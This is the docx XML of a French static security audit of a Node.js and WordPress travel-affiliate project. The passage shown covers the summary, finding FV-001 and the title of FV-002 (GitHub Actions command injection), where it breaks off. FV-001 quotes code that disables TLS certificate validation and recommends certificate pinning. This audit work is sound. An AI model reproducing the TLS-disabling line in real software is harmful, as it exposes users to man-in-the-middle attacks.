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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="600"/>
              <w:left w:type="dxa" w:w="400"/>
              <w:bottom w:type="dxa" w:w="600"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="200" w:after="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">RAPPORT D'AUDIT DE SÉCURITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A0B8D0"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">flashvoyage-ultra-content</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="200"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="7090A0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Branche : refactor-v2  |  Technologie : Node.js / WordPress</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shd w:fill="F5F7FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445566"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Date de l'audit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">01 Mars 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F5F7FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="445566"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Contexte</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Site d'affiliation voyage (outil interne + WordPress public)</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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Moyenne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A233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Informatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E74C3C"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:gridSpan w:val="1"/>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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:gridSpan w:val="1"/>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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2016"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EEF7FD" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2980B9"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">2</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shd w:fill="FFF8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Score de risque global</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">4.5 / 10</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MODÉRÉ — Outil interne / périmètre limité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ Top 3 priorités</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Corriger l'injection CI/CD (FV-002)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ajouter auth_callback REST API pages (FV-003)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Corriger la validation TLS (FV-001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Contexte et périmètre de l'audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ce rapport présente les résultats d'un audit de sécurité statique (SAST) complet du repository flashvoyage-ultra-content, branche refactor-v2. Le projet est un système de génération de contenu automatisé pour un site d'affiliation voyage (FlashVoyage), composé d'un pipeline Node.js et d'un plugin WordPress.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445566"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Langage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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">JavaScript (Node.js ESM) + PHP (WordPress Plugin)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445566"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Framework</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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Express.js (partiel), WordPress MCP Server, GitHub Actions CI/CD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445566"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Contexte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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Outil interne + API WordPress publique (REST API exposée)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445566"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Surface d'attaque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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub Actions (workflow_dispatch), WordPress REST API, appels API tiers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445566"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichiers analysés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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">~60 fichiers JS, 1 plugin PHP, 3 workflows GitHub Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vulnérabilités détaillées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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-001  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Désactivation de la validation TLS (rejectUnauthorized: false)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Haute]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Haute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Cryptographie / Configuration réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">live-data-enricher.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-295 — Improper Certificate Validation, OWASP A02:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un agent HTTPS global est créé avec rejectUnauthorized: false pour contourner une erreur de certificat SSL d'un fournisseur tiers (Travel Advisory). Cela désactive toute validation du certificat serveur pour les requêtes utilisant cet agent, exposant l'application à des attaques Man-in-the-Middle (MITM) où un attaquant peut intercepter et modifier les réponses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const insecureAgent = new https.Agent({ rejectUnauthorized: false });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Corriger le certificat côté fournisseur, ou épingler le certificat attendu :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const fs = require('fs');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const insecureAgent = new https.Agent({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ca: fs.readFileSync('travel-advisory-cert.pem') // Épingler le CA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-002  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Injection de commande shell via inputs non-assainis dans GitHub Actions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
